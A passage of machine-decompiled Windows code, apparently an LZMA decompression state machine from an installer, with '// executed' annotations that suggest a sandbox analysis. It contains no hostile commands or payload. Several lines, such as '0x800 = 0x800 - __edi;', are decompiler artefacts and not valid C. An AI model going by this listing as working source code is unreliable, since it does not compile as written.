                                                                                                                                                                                                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                                            							 *(_t614 - 0x3c) = _t605;
                                                                                                                                                                                                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                                                                                                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                            								if(_t613 == 0) {
                                                                                                                                                                                                                            									L12:
                                                                                                                                                                                                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                                                                                                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            									goto L15;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L11;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L11:
                                                                                                                                                                                                                            									_t613 = _t613 - 1;
                                                                                                                                                                                                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                                                                                                                            								} while (_t613 != 0);
                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *(_t614 - 4) != 0) {
                                                                                                                                                                                                                            								GlobalFree( *(_t614 - 4));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            							 *(_t614 - 4) = _t534;
                                                                                                                                                                                                                            							if(_t534 == 0) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                                                                                                                            								goto L10;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 1:
                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t614 - 0x88) = 1;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                                            							_t45 = _t614 - 0x48;
                                                                                                                                                                                                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t45;
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							if( *(_t614 - 0x48) < 4) {
                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t546 =  *(_t614 - 0x40);
                                                                                                                                                                                                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                            								 *(_t614 - 0x48) = 5;
                                                                                                                                                                                                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t614 - 0x74) = _t546;
                                                                                                                                                                                                                            							if( *(_t614 - 8) != 0) {
                                                                                                                                                                                                                            								GlobalFree( *(_t614 - 8));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                                                                                                                            							 *(_t614 - 8) = _t534;
                                                                                                                                                                                                                            							if(_t534 == 0) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 2:
                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                                                                                                                            							 *(_t614 - 0x84) = 6;
                                                                                                                                                                                                                            							 *(_t614 - 0x4c) = _t553;
                                                                                                                                                                                                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                                            							goto L132;
                                                                                                                                                                                                                            						case 3:
                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t614 - 0x88) = 3;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                                            							_t67 = _t614 - 0x70;
                                                                                                                                                                                                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                                            							__eflags =  *_t67;
                                                                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                                                                                                                            							if( *(_t614 - 0x48) != 0) {
                                                                                                                                                                                                                            								goto L21;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                            						case 4:
                                                                                                                                                                                                                            							goto L133;
                                                                                                                                                                                                                            						case 5:
                                                                                                                                                                                                                            							goto L137;
                                                                                                                                                                                                                            						case 6:
                                                                                                                                                                                                                            							goto L0;
                                                                                                                                                                                                                            						case 7:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            								__eax = 0;
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            								__al = __al & 0x000000fd;
                                                                                                                                                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            								goto L68;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            							 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            							goto L132;
                                                                                                                                                                                                                            						case 8:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L132;
                                                                                                                                                                                                                            						case 9:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								goto L89;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                                            							if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            							__eflags = _t258;
                                                                                                                                                                                                                            							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                                            							goto L75;
                                                                                                                                                                                                                            						case 0xa:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            								goto L132;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							goto L88;
                                                                                                                                                                                                                            						case 0xb:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							L88:
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							L89:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            							 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            							goto L68;
                                                                                                                                                                                                                            						case 0xc:
                                                                                                                                                                                                                            							L99:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t334 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t334;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						case 0xd:
                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                            						case 0xe:
                                                                                                                                                                                                                            							goto L45;
                                                                                                                                                                                                                            						case 0xf:
                                                                                                                                                                                                                            							goto L57;
                                                                                                                                                                                                                            						case 0x10:
                                                                                                                                                                                                                            							L109:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t365;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							goto L111;
                                                                                                                                                                                                                            						case 0x11:
                                                                                                                                                                                                                            							L68:
                                                                                                                                                                                                                            							__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                                            							goto L132;
                                                                                                                                                                                                                            						case 0x12:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            								goto L132;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            							__eflags = __eax;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            							goto L130;
                                                                                                                                                                                                                            						case 0x13:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            								__eflags =  *_t469;
                                                                                                                                                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            								L144:
                                                                                                                                                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            								goto L145;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            							L130:
                                                                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            							goto L144;
                                                                                                                                                                                                                            						case 0x14:
                                                                                                                                                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            							goto L140;
                                                                                                                                                                                                                            						case 0x15:
                                                                                                                                                                                                                            							__eax = 0;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            							__al = __al & 0x000000fd;
                                                                                                                                                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            							goto L120;
                                                                                                                                                                                                                            						case 0x16:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            							__eflags = __eax - 4;
                                                                                                                                                                                                                            							if(__eax >= 4) {
                                                                                                                                                                                                                            								_push(3);
                                                                                                                                                                                                                            								_pop(__eax);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            							__eax = __eax << 7;
                                                                                                                                                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            							goto L145;
                                                                                                                                                                                                                            						case 0x17:
                                                                                                                                                                                                                            							L145:
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							goto L149;
                                                                                                                                                                                                                            						case 0x18:
                                                                                                                                                                                                                            							L146:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t484;
                                                                                                                                                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							L148:
                                                                                                                                                                                                                            							_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            							__eflags =  *_t487;
                                                                                                                                                                                                                            							L149:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            								0 = 1;
                                                                                                                                                                                                                            								__eax = 1 << __cl;
                                                                                                                                                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            								goto L140;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                                                                            								__eax = __eax - __ecx;
                                                                                                                                                                                                                            								__edx = __edx + 1;
                                                                                                                                                                                                                            								__eflags = __edx;
                                                                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                                                                            								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            								goto L148;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L146;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 0x19:
                                                                                                                                                                                                                            							__eflags = __ebx - 4;
                                                                                                                                                                                                                            							if(__ebx < 4) {
                                                                                                                                                                                                                            								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            								L119:
                                                                                                                                                                                                                            								_t393 = __ebp - 0x2c;
                                                                                                                                                                                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            								__eflags =  *_t393;
                                                                                                                                                                                                                            								L120:
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            								if(__eax == 0) {
                                                                                                                                                                                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            									goto L170;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            									goto L171;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            								_t400 = __ebp - 0x60;
                                                                                                                                                                                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            								__eflags =  *_t400;
                                                                                                                                                                                                                            								goto L123;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = __ebx;
                                                                                                                                                                                                                            							__eax = __ebx;
                                                                                                                                                                                                                            							__ecx = __ebx >> 1;
                                                                                                                                                                                                                            							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            							__al = __al | 0x00000002;
                                                                                                                                                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            							__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            							if(__ebx >= 0xe) {
                                                                                                                                                                                                                            								__ebx = 0;
                                                                                                                                                                                                                            								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            								L102:
                                                                                                                                                                                                                            								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            									__eax = __eax + __ebx;
                                                                                                                                                                                                                            									 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            									__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            									L108:
                                                                                                                                                                                                                            									__ebx = 0;
                                                                                                                                                                                                                            									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            									 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            									 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            									 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            									L112:
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            										_t391 = __ebp - 0x2c;
                                                                                                                                                                                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            										__eflags =  *_t391;
                                                                                                                                                                                                                            										goto L119;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            									__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            									__esi = __edi + __eax;
                                                                                                                                                                                                                            									 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            									__ax =  *__esi;
                                                                                                                                                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            										__ecx = 0;
                                                                                                                                                                                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            										__ecx = 1;
                                                                                                                                                                                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            										__ebx = 1;
                                                                                                                                                                                                                            										__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            										__ebx = 1 << __cl;
                                                                                                                                                                                                                            										__ecx = 1 << __cl;
                                                                                                                                                                                                                            										__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            										__cx = __ax;
                                                                                                                                                                                                                            										__cx = __ax >> 5;
                                                                                                                                                                                                                            										__eax = __eax - __ecx;
                                                                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                                                                            										__eflags = __edi;
                                                                                                                                                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            										 *__esi = __ax;
                                                                                                                                                                                                                            										 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            										0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
